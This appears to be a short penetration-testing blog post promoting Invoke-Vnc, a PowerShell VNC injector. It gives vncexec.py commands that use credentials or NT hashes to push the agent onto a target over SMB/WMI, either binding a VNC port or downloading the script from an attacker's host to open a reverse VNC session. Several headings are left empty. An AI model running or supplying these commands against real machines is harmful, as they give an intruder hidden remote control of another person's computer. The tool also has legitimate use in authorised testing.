Execute agent remotely via WMI
If you have authenticated access (password, nt hash or kerberos ticket) to the machine, you can use the vncexec.py script to execute the VNC agent.
Upload an encoded ps1 script as a bat file via SMB and execute the agent to bind a VNC port on target:
vncexec.py -invoke-vnc-path Invoke-Vnc.ps1 -contype bind -vncport 5900 -vncpass P@ssw0rd -method upload user:pass@target_ip
Download the script via HTTP from the attacker’s host and execute the agent to get a reverse VNC connection:
vncexec.py -bc-ip -httpport 8080 -invoke-vnc-path Invoke-Vnc.ps1 -contype reverse -vncport 5500 -vncpass P@ssw0rd -method download user:pass@target_ip
Script depends on a recent build of impacket library. Get it at http://ift.tt/1JaAv3K
git clone http://ift.tt/1JaAv3K
sudo python setup.py install
Invoke over net:
Launch VNC listener to catch reverse VNC connection:
The post Invoke-Vnc: Powershell VNC injector appeared first on Penetration Testing.